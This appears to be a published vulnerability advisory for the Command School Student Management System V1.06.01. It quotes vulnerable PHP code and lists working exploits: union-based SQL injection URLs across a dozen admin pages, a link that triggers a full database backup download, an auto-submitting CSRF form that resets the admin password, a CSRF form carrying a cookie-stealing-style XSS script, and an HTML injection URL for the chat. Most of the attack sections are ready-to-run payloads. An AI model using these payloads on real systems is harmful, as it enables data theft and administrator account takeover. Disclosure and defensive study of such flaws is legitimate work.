facebook facebook twitter rss

Command School Student Management System V1.06.01 - Multiple Vulnerabilties

Author: AtT4CKxT3rR0r1ST , Published: 09-01-2014
Command School Student Management System V1.06.01  - Multiple Vulnerabilties
============================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://sourceforge.net/projects/swifttide/
####################################################################

I. Multiple Sql Injection

##############
VULNERABILITY
##############
/admin_school_names.php
-----------------------------------------------------------------------------
line (27): $action=get_param("action");
line (54-56)
case "edit":
$school_names_id=get_param("id");
$sSQL="SELECT school_names_desc FROM school_names WHERE school_names_id=$school_names_id";


note:[all Files same error]
-----------------------------------------------------------------------------

#########
EXPLOIT
#########

localhost/sw/admin_school_names.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_subjects.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_grades.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_terms.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_school_years.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_sgrades.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_media_codes_1.php?action=edit&id=null+and+1=2+union+select+version(),2,3
localhost/sw/admin_infraction_codes.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_generations.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_relations.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/admin_titles.php?action=edit&id=null+and+1=2+union+select+version()
localhost/sw/health_allergies.php?action=edit&id=null+and+1=2+union+select+version()


II. Backup Download

##############
VULNERABILITY
##############

/Backup/backup_ray2.php (LINE: 78-126)

-----------------------------------------------------------------------------
// SET THE NAME OF THE BACKUP WITH A TIMESTAMP
$bkup = 'mysql' . date('Ymd\THis') . $db_name . '.txt';
$fp = fopen($bkup, "w");


// GET THE LIST OF TABLES
$sql = "SHOW TABLES";
$res = mysql_query($sql);
if (!$res) die( mysql_error() );
if (mysql_num_rows($res) == 0) die( "NO TABLES IN $db_name" );
while ($s = mysql_fetch_array($res))
{
$tables[] = $s[0];
}


// ITERATE OVER THE LIST OF TABLES
foreach ($tables as $table)
{

// WRITE THE DROP TABLE STATEMENT
fwrite($fp,"DROP TABLE `$table`;\n");

// GET THE CREATE TABLE STATEMENT
$res = mysql_query("SHOW CREATE TABLE `$table`");
if (!$res) die( mysql_error() );
$cre = mysql_fetch_array($res);
$cre[1] .= ";";
$txt = str_replace("\n", "", $cre[1]); // FIT EACH QUERY ON ONE LINE
fwrite($fp, $txt . "\n");

// GET THE TABLE DATA
$data = mysql_query("SELECT * FROM `$table`");
$num = mysql_num_fields($data);
while ($row = mysql_fetch_array($data))
{

// MAKE INSERT STATEMENTS FOR ALL THE VALUES
$txt = "INSERT INTO `$table` VALUES(";
for ($i=0; $i < $num; $i++)
{
$txt .= "'".mysql_real_escape_string($row[$i])."', ";
}
$txt = substr($txt, 0, -2);
fwrite($fp, $txt . ");\n");
}
}
// ALL DONE
fclose($fp);
-----------------------------------------------------------------------------

#####################################################
EXPLOIT
#####################################################

<html>
<title>Iphobos Blog</title>
<label><a href="http://localhost/sw/backup/backup_ray2.php" class="button white">Backup Download</a></label>
</html>



III. Cross Site Request Forgery

[Change Password Admin]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://localhost/sw/admin_change_password.php">
<input type="hidden" name="password" value="123456" />
<input type="hidden" name="action" value="update" />
</form>
</body>
</html>


IV. Cross Site Scripting

[CSRF with XSS Exploit]

<html>
<body onload="document.form0.submit();">
<form method="POST" name="form0" action="http://localhost/sw/add_topic.php">
<input type="hidden" name="topic" value="<script>alert(document.cookie);</script>" />
<input type="hidden" name="detail" value="Iphobos Blog" />
<input type="hidden" name="Submit" value="Submit" />
</form>
</body>
</html>

V. Html File Injection

##############
VULNERABILITY
##############
/chat/message.php (LINE: 4-12)
-----------------------------------------------------------------------------
$f = fopen('msg.html',"a+");
} else {
$f = fopen('msg.html',"w+");
}
$nick = isset($_GET['nick']) ? $_GET['nick'] : "Hidden";
$msg = isset($_GET['msg']) ? htmlspecialchars($_GET['msg']) : ".";
$line = "<p><span class=\"name\">$nick: </span><span class=\"txt\">$msg</span></p>";
fwrite($f,$line."\r\n");
fclose($f);

-----------------------------------------------------------------------------

#########
EXPLOIT
#########

localhost/sw/chat/message.php?line=&nick=IPHOBOS&msg=BLOG

After Exploit Go To localhost/sw/chat/msg.html
you will find the injection information

####################################################################

Like us on Facebook :